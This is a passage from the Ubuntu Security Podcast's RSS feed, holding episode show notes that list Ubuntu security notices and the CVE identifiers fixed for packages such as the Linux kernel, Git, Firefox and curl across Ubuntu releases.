<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-25725">CVE-2023-25725</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-24580">CVE-2023-24580</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5871-1-git-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5871-1">USN-5871-1</a>] Git vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-23946">CVE-2023-23946</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22490">CVE-2023-22490</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5870-1-apr-util-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5870-1">USN-5870-1</a>] apr-util vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-25147">CVE-2022-25147</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E187.mp3" length="26573177" type="audio/mpeg" /><itunes:duration>1628</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 186
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-186/</link>
          <pubDate>Fri, 10 Feb 2023 14:14:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>986aa69cb07f2e9ab9af7d72e6c69a04c2478a022602d075234912e4ea8414d3de029c8653bbe6500c8457ff5c4c71ed8890dd6bafa116bcf554a179216cdd8a</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 186</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          The Ubuntu Security Podcast is back for 2023! We ease into the year with
  coverage of the recently announced launch of Ubuntu Pro as GA, plus we look at
  some recent vulns in git, sudo, OpenSSL and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  The Ubuntu Security Podcast is back for 2023! We ease into the year with
  coverage of the recently announced launch of Ubuntu Pro as GA, plus we look at
  some recent vulns in git, sudo, OpenSSL and more.
  </itunes:summary>
        <description>  The Ubuntu Security Podcast is back for 2023! We ease into the year with
  coverage of the recently announced launch of Ubuntu Pro as GA, plus we look at
  some recent vulns in git, sudo, OpenSSL and more.
  </description>
        <googleplay:description>  The Ubuntu Security Podcast is back for 2023! We ease into the year with
  coverage of the recently announced launch of Ubuntu Pro as GA, plus we look at
  some recent vulns in git, sudo, OpenSSL and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>The Ubuntu Security Podcast is back for 2023! We ease into the year with
coverage of the recently announced launch of Ubuntu Pro as GA, plus we look at
some recent vulns in git, sudo, OpenSSL and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>212 unique CVEs addressed</p>
<h3 id="usn-5778-1-x-dot-org-x-server-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5778-1">USN-5778-1</a>] X.Org X Server vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-46344">CVE-2022-46344</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46343">CVE-2022-46343</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46342">CVE-2022-46342</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46341">CVE-2022-46341</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46340">CVE-2022-46340</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4283">CVE-2022-4283</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5779-1-linux-kernel--azure--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5779-1">USN-5779-1</a>] Linux kernel (Azure) vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3621">CVE-2022-3621</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3594">CVE-2022-3594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3567">CVE-2022-3567</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3566">CVE-2022-3566</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3565">CVE-2022-3565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3564">CVE-2022-3564</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3524">CVE-2022-3524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42703">CVE-2022-42703</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43945">CVE-2022-43945</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5780-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5780-1">USN-5780-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-42896">CVE-2022-42896</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42895">CVE-2022-42895</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3628">CVE-2022-3628</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3619">CVE-2022-3619</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3524">CVE-2022-3524</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5781-1-emacs-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5781-1">USN-5781-1</a>] Emacs vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-45939">CVE-2022-45939</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5782-1-firefox-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5782-1">USN-5782-1</a>] Firefox vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-46879">CVE-2022-46879</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46878">CVE-2022-46878</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46877">CVE-2022-46877</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46874">CVE-2022-46874</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46873">CVE-2022-46873</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46872">CVE-2022-46872</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46871">CVE-2022-46871</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5783-1-linux-kernel--oem--vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5783-1">USN-5783-1</a>] Linux kernel (OEM) vulnerability</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-42896">CVE-2022-42896</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5784-1-usbredir-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5784-1">USN-5784-1</a>] usbredir vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3700">CVE-2021-3700</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5785-1-freeradius-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5785-1">USN-5785-1</a>] FreeRADIUS vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-41861">CVE-2022-41861</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41860">CVE-2022-41860</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17185">CVE-2019-17185</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5786-1-gnome-files-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5786-1">USN-5786-1</a>] GNOME Files vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-37290">CVE-2022-37290</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5787-1-libksba-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5787-1">USN-5787-1</a>] Libksba vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-47629">CVE-2022-47629</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5782-2-firefox-regressions">[<a href="https://ubuntu.com/security/notices/USN-5782-2">USN-5782-2</a>] Firefox regressions</h3>
<ul>
<li>7 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-46879">CVE-2022-46879</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46878">CVE-2022-46878</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46877">CVE-2022-46877</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46874">CVE-2022-46874</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46873">CVE-2022-46873</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46872">CVE-2022-46872</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46871">CVE-2022-46871</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5789-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5789-1">USN-5789-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3621">CVE-2022-3621</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3594">CVE-2022-3594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3567">CVE-2022-3567</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3566">CVE-2022-3566</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3564">CVE-2022-3564</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3524">CVE-2022-3524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-33743">CVE-2022-33743</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26365">CVE-2022-26365</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42703">CVE-2022-42703</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43945">CVE-2022-43945</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5788-1-curl-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5788-1">USN-5788-1</a>] curl vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-43552">CVE-2022-43552</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43551">CVE-2022-43551</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5790-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5790-1">USN-5790-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-4095">CVE-2022-4095</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40307">CVE-2022-40307</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39188">CVE-2022-39188</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3586">CVE-2022-3586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3061">CVE-2022-3061</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20421">CVE-2022-20421</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4159">CVE-2021-4159</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5791-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5791-1">USN-5791-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-43750">CVE-2022-43750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4095">CVE-2022-4095</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40307">CVE-2022-40307</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39842">CVE-2022-39842</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3646">CVE-2022-3646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3586">CVE-2022-3586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3303">CVE-2022-3303</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3061">CVE-2022-3061</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2663">CVE-2022-2663</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20421">CVE-2022-20421</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5792-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5792-1">USN-5792-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>13 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-43750">CVE-2022-43750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4095">CVE-2022-4095</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40307">CVE-2022-40307</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39842">CVE-2022-39842</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39188">CVE-2022-39188</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3649">CVE-2022-3649</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3646">CVE-2022-3646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3586">CVE-2022-3586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3303">CVE-2022-3303</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3061">CVE-2022-3061</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2663">CVE-2022-2663</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20421">CVE-2022-20421</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0171">CVE-2022-0171</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5793-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5793-1">USN-5793-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>17 CVEs addressed in Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-43750">CVE-2022-43750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41850">CVE-2022-41850</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41849">CVE-2022-41849</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4095">CVE-2022-4095</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40307">CVE-2022-40307</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3977">CVE-2022-3977</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3649">CVE-2022-3649</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3623">CVE-2022-3623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3586">CVE-2022-3586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3646">CVE-2022-3646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3544">CVE-2022-3544</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3543">CVE-2022-3543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3541">CVE-2022-3541</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3303">CVE-2022-3303</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2663">CVE-2022-2663</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20421">CVE-2022-20421</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3910">CVE-2022-3910</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5794-1-linux-kernel--aws--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5794-1">USN-5794-1</a>] Linux kernel (AWS) vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-45934">CVE-2022-45934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3643">CVE-2022-3643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42896">CVE-2022-42896</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43945">CVE-2022-43945</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5787-2-libksba-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5787-2">USN-5787-2</a>] Libksba vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-47629">CVE-2022-47629</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5795-1-net-snmp-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5795-1">USN-5795-1</a>] Net-SNMP vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-44793">CVE-2022-44793</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-44792">CVE-2022-44792</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5796-1-w3m-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5796-1">USN-5796-1</a>] w3m vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-38223">CVE-2022-38223</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5797-1-webkitgtk-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5797-1">USN-5797-1</a>] WebKitGTK vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-46700">CVE-2022-46700</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46699">CVE-2022-46699</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46698">CVE-2022-46698</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46692">CVE-2022-46692</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42867">CVE-2022-42867</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42856">CVE-2022-42856</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42852">CVE-2022-42852</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5792-2-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5792-2">USN-5792-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>13 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-43750">CVE-2022-43750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4095">CVE-2022-4095</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40307">CVE-2022-40307</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39842">CVE-2022-39842</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39188">CVE-2022-39188</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3649">CVE-2022-3649</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3646">CVE-2022-3646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3586">CVE-2022-3586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3303">CVE-2022-3303</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3061">CVE-2022-3061</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2663">CVE-2022-2663</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20421">CVE-2022-20421</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0171">CVE-2022-0171</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5793-2-linux-kernel--azure--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5793-2">USN-5793-2</a>] Linux kernel (Azure) vulnerabilities</h3>
<ul>
<li>17 CVEs addressed in Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-43750">CVE-2022-43750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41850">CVE-2022-41850</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41849">CVE-2022-41849</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4095">CVE-2022-4095</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40307">CVE-2022-40307</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3977">CVE-2022-3977</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3649">CVE-2022-3649</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3623">CVE-2022-3623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3586">CVE-2022-3586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3646">CVE-2022-3646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3544">CVE-2022-3544</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3543">CVE-2022-3543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3541">CVE-2022-3541</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3303">CVE-2022-3303</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2663">CVE-2022-2663</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20421">CVE-2022-20421</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3910">CVE-2022-3910</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5782-3-firefox-regressions">[<a href="https://ubuntu.com/security/notices/USN-5782-3">USN-5782-3</a>] Firefox regressions</h3>
<ul>
<li>7 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-46879">CVE-2022-46879</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46878">CVE-2022-46878</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46877">CVE-2022-46877</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46874">CVE-2022-46874</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46873">CVE-2022-46873</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46872">CVE-2022-46872</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-46871">CVE-2022-46871</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5796-2-w3m-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5796-2">USN-5796-2</a>] w3m vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-38223">CVE-2022-38223</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5798-1-dot-net-6-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5798-1">USN-5798-1</a>] .NET 6 vulnerability</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS), Kinetic (22.10)
<ul>
